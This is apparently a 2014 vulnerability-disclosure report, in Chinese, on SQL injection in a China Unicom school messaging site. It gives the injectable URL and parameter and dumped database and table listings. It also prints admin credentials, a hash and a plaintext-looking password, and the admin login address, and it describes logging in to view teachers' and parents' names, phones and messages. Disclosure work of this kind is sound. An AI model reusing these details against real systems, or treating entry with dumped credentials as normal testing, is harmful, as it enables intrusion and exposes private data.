中国联通某站SQL注入致用户信息泄漏

漏洞详情

披露状态:

2014-05-21: 细节已通知厂商并且等待厂商处理中
2014-05-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

中国联通某站存在sql注入,进入后台看了看,没有干坏事,有个上传点,不过我没有测试~~
听说联通的漏洞给的rank都不高~~这是为什么勒~?

详细说明:

有不少教师包括校长的信息,妈妈再也不用担心我的学习了~

每天管理员、教师通过这个平台发不少短信呢~~

0x01:这里是注入点,没有没其他点了,估计注入点少不了:http://jxt.yb10010.com/Public/ShowDetail.aspx?LB=2&ID=267,ID存在注入

1.png



0x02:数据库

available databases [6]:
[*] jxt
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb



0x03:jxt中的表:

Database: jxt                                                                                      
[122 tables]
+-------------------------+
| dbo.A_D_dlshang |
| dbo.A_S_Khwda |
| dbo.A_S_cdan |
| dbo.A_S_config |
| dbo.A_S_jse |
| dbo.A_S_qxian |
| dbo.A_S_zhu |
| dbo.A_W_Kjian |
| dbo.A_W_lmu |
| dbo.A_W_xwen |
| dbo.A_W_zliao |
| dbo.A_W_zllbie |
| dbo.Admin |
| dbo.Article |
| dbo.BigClass |
| dbo.D99_CMD |
| dbo.FourClass |
| dbo.GetPwd |
| dbo.I_fblbie |
| dbo.I_fbxxi |
| dbo.I_fbxxi1 |
| dbo.I_fbxxiLog |
| dbo.I_fkxxi |
| dbo.I_jsfkxxi |
| dbo.I_kqxxi |
| dbo.I_schoolPyu |
| dbo.I_xspyu |
| dbo.KQStatus |
| dbo.K_kqxxi |
| dbo.Log |
| dbo.MmsGet |
| dbo.MmsSEND |
| dbo.MobileGet |
| dbo.MobileSend |
| dbo.MobileSendLog |
| dbo.N_Dzjtiao |
| dbo.N_Fdszhi |
| dbo.N_JSKQGX_Jlu |
| dbo.N_JSKQGX_Szhi |
| dbo.N_JSKQ_Card |
| dbo.N_JSKQ_Jlu |
| dbo.N_JSKQ_Szhi |
| dbo.N_KqJlu |
| dbo.N_KqJlu2 |
| dbo.N_KqLmu |
| dbo.N_Kqszhi |
| dbo.N_KsNoTji |
| dbo.N_XsCard |
| dbo.N_XsCard_History |
| dbo.O_grswu |
| dbo.O_kcbiao |
| dbo.O_xxckan |
| dbo.O_xxswu |
| dbo.ParBigClass |
| dbo.ParSmallClass |
| dbo.ParThirdClass |
| dbo.ParamList |
| dbo.SP_provider |
| dbo.S_Advice |
| dbo.S_BjJshi |
| dbo.S_Jses |
| dbo.S_Lmu |
| dbo.S_bji |
| dbo.S_cdan |
| dbo.S_config |
| dbo.S_jse |
| dbo.S_kmu |
| dbo.S_nji |
| dbo.S_qxian |
| dbo.S_xxjgou |
| dbo.S_yfjbxxi |
| dbo.S_zdyljie |
| dbo.S_zhu |
| dbo.S_ztai |
| dbo.SendLog |
| dbo.Send_Sms_S_Zhu |
| dbo.Send_Sms_U_zhu |
| dbo.Send_Sms_U_zhu_back |
| dbo.SmallClass |
| dbo.T_cjpming |
| dbo.T_cjxxi |
| dbo.T_fzszhi |
| dbo.T_kongzhiqipeizhi |
| dbo.T_ksxxi |
| dbo.T_kszhi |
| dbo.T_xqszhi |
| dbo.ThirdClass |
| dbo.U_bjsquan |
| dbo.U_jbxxi |
| dbo.U_jcxxi |
| dbo.U_studentGroup |
| dbo.U_xsjzhang |
| dbo.U_zhlbie |
| dbo.U_zhu |
| dbo.V_black |
| dbo.V_jiegua |
| dbo.V_teacher |
| dbo.V_white |
| dbo.View_Card_Student |
| dbo.View_Card_Teacher |
| dbo.View_NoCard_Student |
| dbo.View_NoCard_Teacher |
| dbo.VisitRecord |
| dbo.department |
| dbo.dtproperties |
| dbo.everyDay |
| dbo.everyMonth |
| dbo.kqDuanXin |
| dbo.messageGroup |
| dbo.mobilesendV |
| dbo.mood |
| dbo.s_schoolMsg |
| dbo.s_schoolMsgType |
| dbo.select_check_sms |
| dbo.select_users |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.test |
| dbo.tongji_LB |
| dbo.v |
| dbo.view_chengji |
| dbo.view_smsBodyPart |
+-------------------------+



0x04:找了几个可能有admin的表跑了一下:

Database: jxt
Table: dbo.admin
[1 entry]
+----+----------+------------------+------------------+
| ID | UserName | Password | RndPassword |
+----+----------+------------------+------------------+
| 13 | admin | 7a57a5a743894a0e | r84y6115O3q4tQFJ |
+----+----------+------------------+------------------+

Database: jxt
Table: dbo.A_S_zhu
[1 entry]
+-------+-------+-----------+--------+
| Js_ID | zh_ID | mma | Zhming |
+-------+-------+-----------+--------+
| 1 | 1 | ybltadmin | admin |
+-------+-------+-----------+--------+



0x05:后台地址:http://jxt.yb10010.com/Public/JxtLoginS.aspx

进去看看,结果看到了很多教师,家长的姓名、电话、短信内容……还有个可以上传的地方,不过我没有测试,家长信息

.jpg

教师信息

.jpg



漏洞证明:

同上

修复方案:

过滤

信息泄漏无小事,希望认真对待~~

版权声明:转载请注明来源 PythonPig@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-05-21 10:54

厂商回复:

最新状态:

2014-05-26:CNVD确认并复现所述情况,转由CNCERT协调中国联合网络通信集团有限公司通报处置。


漏洞评价: